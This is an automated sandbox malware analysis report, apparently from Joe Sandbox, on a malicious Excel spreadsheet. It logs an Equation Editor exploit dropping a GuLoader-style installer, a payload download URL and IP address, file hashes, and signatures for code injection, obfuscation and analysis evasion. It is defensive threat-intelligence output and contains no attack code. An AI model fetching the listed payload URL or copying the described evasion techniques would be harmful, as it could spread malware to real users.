Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405C49
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406873 FindFirstFileW,FindClose,	4_2_00406873
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Software Vulnerabilities

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 50.16.4.125:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 50.16.4.125:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 60MB

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://dariamob.ro/wed/eee_XScUCMEVL47.

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AMAZON-AESUS AMAZON-AESUS

Downloads executable code via HTTP

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125
Source: unknown	TCP traffic detected without corresponding DNS query: 50.16.4.125

Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: vbc.exe, 00000004.00000000.464184566.000000000040A000.00000008.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: vbc.exe.2.dr, raki[1].exe.2.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2864187B.emf

Jump to behavior

Source: global traffic

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

4_2_004056DE

System Summary

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe

4_2_0040352D

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040755C	4_2_0040755C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406D85	4_2_00406D85
Source: C:\Users\Public\vbc.exe	Code function: 4_2_73191BFF	4_2_73191BFF

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

PE file contains strange resources

Source: raki[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: raki[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: raki[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Source: 7027521.xlsx	Virustotal: Detection: 48%
Source: 7027521.xlsx	Metadefender: Detection: 23%
Source: 7027521.xlsx	ReversingLabs: Detection: 44%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\Public\vbc.exe

4_2_0040352D

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$7027521.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE8A9.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.winXLSX@4/24@0/1

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004021AA CoCreateInstance,

4_2_004021AA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

4_2_0040498A

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: secur32.pdb source: secur32.dll.4.dr
Source:	Binary string: SxsStore.pdb source: sxsstore.dll.4.dr
Source:	Binary string: secur32.pdbUGP source: secur32.dll.4.dr
Source:	Binary string: SxsStore.pdbGCTL source: sxsstore.dll.4.dr

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000004.00000002.680919956.0000000003790000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_731930C0 push eax; ret

4_2_731930EE

PE file contains sections with non-standard names

Source: secur32.dll.4.dr

Static PE information: section name: .didat

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_73191BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

4_2_73191BFF

Binary contains a suspicious time stamp

Source: secur32.dll.4.dr

Static PE information: 0xAEC0B68B [Mon Nov 27 15:00:27 2062 UTC]

Persistence and Installation Behavior

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\sxsstore.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\secur32.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2584

Thread sleep time: -300000s >= -30000s

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\Public\vbc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sxsstore.dll

Jump to dropped file

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405C49
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406873 FindFirstFileW,FindClose,	4_2_00406873
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node

Source: vbc.exe, 00000004.00000002.680174022.00000000005CF000.00000004.00000020.00020000.00000000.sdmp

Anti Debugging

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_73191BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

4_2_73191BFF

HIPS / PFW / Operating System Protection Evasion

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"

Jump to behavior

Source: C:\Users\Public\vbc.exe

4_2_0040352D

ID:	560280
Product:	CloudBasic
Start time:	10:39:37
Start date:	26.01.2022
Sample:	7027521.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	e96baf78f2a98321ae47d4d82e608124
SHA1:	e9ea3b397b7c2d5be07845745f621aef0d8d4db0
SHA256:	180125c408724bb6ef0037c028439058d6f0b8326b679e02d7cba8d24461c3bf
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	0DCB37FF90B93B7A3225707B1AF111B8	E43402BD22A03687FC4FBE36CBB607ECC7BC1A0F	4468C48F99C92E56BB04921A42676511C64B39F9AE99FCD08F2A10251618BAF2
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2864187B.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	D6822083BFFC8F231A49532F07C2912A	7DFEB1E76C379822A45B7A22B3049479485A8AAF	3BF445DA5FFB7F79F35705E01D731098AAF6FEC17EBE16BB20C88E232FC5AA90
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\38B5F198.png	PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced	590B1C3ECA38E4210C19A9BCBAF69F8D	556C229F539D60F1FF434103EC1695C7554EB720	E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3A630C1D.png	PNG image data, 139 x 180, 8-bit colormap, non-interlaced	5EB99F38CB355D8DAD5E791E2A0C9922	83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA	5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\52D94040.png	PNG image data, 139 x 180, 8-bit colormap, non-interlaced	E46357D82EBC866EEBDA98FA8F94B385	76C27D89AB2048AE7B56E401DCD1B0449B6DDF05	B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\54488366.png	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced	66EF10508ED9AE9871D59F267FBE15AA	E40FDB09F7FDA69BD95249A76D06371A851F44A6	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5AE1F18C.png	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced	66EF10508ED9AE9871D59F267FBE15AA	E40FDB09F7FDA69BD95249A76D06371A851F44A6	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\652ED133.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3	22FEC44258BA0E3A910FC2A009CEE2AB	BF6749433E0DBCDA3627C342549C8A8AB3BF51EB	5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\929BD04E.png	PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced	590B1C3ECA38E4210C19A9BCBAF69F8D	556C229F539D60F1FF434103EC1695C7554EB720	E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9CB02B7A.png	PNG image data, 139 x 180, 8-bit colormap, non-interlaced	E46357D82EBC866EEBDA98FA8F94B385	76C27D89AB2048AE7B56E401DCD1B0449B6DDF05	B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE1C341.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3	22FEC44258BA0E3A910FC2A009CEE2AB	BF6749433E0DBCDA3627C342549C8A8AB3BF51EB	5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DE86A7F7.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F757D4B9.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF502F.png	PNG image data, 139 x 180, 8-bit colormap, non-interlaced	5EB99F38CB355D8DAD5E791E2A0C9922	83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA	5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
C:\Users\user\AppData\Local\Temp\Pyknisk.dat	data	270B01C8C789557B4D6DEEDFDB1050AD	3445451F85C3BD8824E984977A71268FA4F82240	6A7FB12A3EE8E9F070024D4573FF1A058451179EC46A1AD2ABC8D2B704E82F37
C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	CFF85C549D536F651D4FB8387F1976F2	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
C:\Users\user\AppData\Local\Temp\secur32.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	E1FA0E4751888A35553A93778A348A24	98667AE0AB2D955E69C365D62F2DD1A8C839E14E	A074AA8C960FF9F9F609604DB0B6FEFDD454CEB746DE6749753A551FE7B99B51
C:\Users\user\AppData\Local\Temp\sxsstore.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	3F305E85F2751C4AA1A4EFDF3240EDA6	FBD849B83E98E5D0F2A2B2F8E3649ADA7078B2E9	95444BF7752F9092FE00CA6F96FD170820026ED990B1EA59CE34524978B4EB12
C:\Users\user\AppData\Local\Temp\~DF12666A7CD415755E.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DF505DD9AFA69CB501.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\AppData\Local\Temp\~DF5384EF3ECDAC44CB.TMP	CDFV2 Encrypted	E96BAF78F2A98321AE47D4D82E608124	E9EA3B397B7C2D5BE07845745F621AEF0D8D4DB0	180125C408724BB6EF0037C028439058D6F0B8326B679E02D7CBA8D24461C3BF
C:\Users\user\AppData\Local\Temp\~DF928E213DED05A15C.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\Desktop\~$7027521.xlsx	data	797869BB881CFBCDAC2064F92B26E46F	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	0DCB37FF90B93B7A3225707B1AF111B8	E43402BD22A03687FC4FBE36CBB607ECC7BC1A0F	4468C48F99C92E56BB04921A42676511C64B39F9AE99FCD08F2A10251618BAF2

Windows Analysis Report
7027521.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report 7027521.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
7027521.xlsx